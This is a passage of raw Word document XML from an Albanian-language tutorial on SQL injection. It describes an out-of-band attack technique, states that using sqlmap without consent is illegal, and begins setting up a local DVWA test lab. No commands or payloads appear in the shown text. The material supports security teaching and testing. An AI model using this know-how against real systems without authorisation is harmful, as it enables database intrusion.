      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tiparet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>që</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aktivizohen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>serverin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bazës</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>së</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dhënave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rastet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>përdoret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lloj</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sulmit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>është</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>një</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sulmues</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>është</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gjendje</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përdorë</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njëjtin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kanal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>për</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filluar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sulmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>për</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mbledhur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rezultate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kjo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teknik</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ofron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>një</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sulmuesi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>një</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alternativë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ndaj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teknikave</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bazuara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kohë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>veçanërisht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nëse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>përgjigjet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>serverit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>janë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shumë</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qëndrueshme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (duke e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bërë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>një</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sulm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>përfundimtar</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bazuar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kohë</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pasigurt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF sqlmap_StackedQueries \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0004150C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="001427DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022A239" w14:textId="4EC7EB9C" w:rsidR="000C31F5" w:rsidRPr="00213158" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00213158">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidRPr="00213158">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>rdorimi</w:t>
      </w:r>
      <w:r w:rsidRPr="00213158">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> i Sqlmap për sulmimin e objektivave pa pëlqimin paraprak të ndërsjellë është i paligjshëm. Përgjegjësia është e  përdoruesit dhe duhet t'i bindet të gjitha ligjeve të zbatueshme lokale, shtetërore dhe federale. Zhvilluesit nuk marrin asnjë përgjegjësi dhe nuk janë përgjegjës për çdo keqpërdorim ose dëmtim të shkaktuar nga ky program. Pasi që kjo vegël mund të përdoret edhe nga sulmuesit prandaj duhet pasur kujdes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937125B" w14:textId="6F6ACB31" w:rsidR="00EF2D7F" w:rsidRPr="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00EF2D7F" w:rsidRPr="00EF2D7F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1380" w:right="1320" w:bottom="920" w:left="1220" w:header="727" w:footer="739" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C7ECBF" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D2445D" w14:textId="5012053B" w:rsidR="009C0AEA" w:rsidRPr="005672AE" w:rsidRDefault="005672AE" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1299"/>
          <w:tab w:val="left" w:pos="1300"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_TOC_250002"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE83B76" w14:textId="013E165B" w:rsidR="005672AE" w:rsidRDefault="005672AE" w:rsidP="005672AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1299"/>
          <w:tab w:val="left" w:pos="1300"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EC5788" w14:textId="167EC626" w:rsidR="005672AE" w:rsidRDefault="005672AE" w:rsidP="005672AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Përgatitja e </w:t>
      </w:r>
      <w:r w:rsidR="00907F1F">
        <w:t>mjedisit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71898CE2" w14:textId="44EEA15A" w:rsidR="005672AE" w:rsidRDefault="005672AE" w:rsidP="005672AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B0DF3A" w14:textId="1891DECE" w:rsidR="005672AE" w:rsidRDefault="005672AE" w:rsidP="004F1E56">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004F1E56">
        <w:t>Sqlmap është një vegël shumë e fuqishme, e cila automatizon shumë procese për sql injection dhe lejon që të përdoret edhe nga përdorues të cilët nuk kanë dijeni se si të implementojn shumicën e sulmeve për sql injection. Si e tillë duhet të përdoret në aplikacione të cilat jemi duke i zhvilluar ne, për qëllime testimi të vulnerabilities ose në aplikacione në të cilat kemi leje që të testojmë. Përdorimi i kësaj vegle në aplikacione ku nuk kemi leje për testime, mund të rezultoj në dëme të mëdha për kompaninë e cila zotëron aplikacionin në fjalë dhe njëkohësisht kalon në krim kibernetik.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D426E" w14:textId="38F23853" w:rsidR="004F1E56" w:rsidRDefault="004F1E56" w:rsidP="004F1E56">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003D2F28">
        <w:t xml:space="preserve">Për qëllime të eksplorimit të mundësive që na ofron vegla sqlmap, ne do të përgatisim një ambient testues, me një aplikacion jo të mbrojtur mirë ose të cenueshëm të hostuar lokalisht. Për këtë qëllim kemi zgjedhur Damn Vulnerable Web App (DVWA). </w:t>
      </w:r>
      <w:r w:rsidR="003D2F28" w:rsidRPr="003D2F28">
        <w:t xml:space="preserve">Damn Vulnerable Web App (DVWA) është një </w:t>
      </w:r>
      <w:r w:rsidR="003D2F28">
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidR="003D2F28" w:rsidRPr="003D2F28">
        <w:t>aplikacion</w:t>
      </w:r>
      <w:r w:rsidR="003D2F28">
        <w:t>, i zhvilluar në</w:t>
      </w:r>
      <w:r w:rsidR="003D2F28" w:rsidRPr="003D2F28">
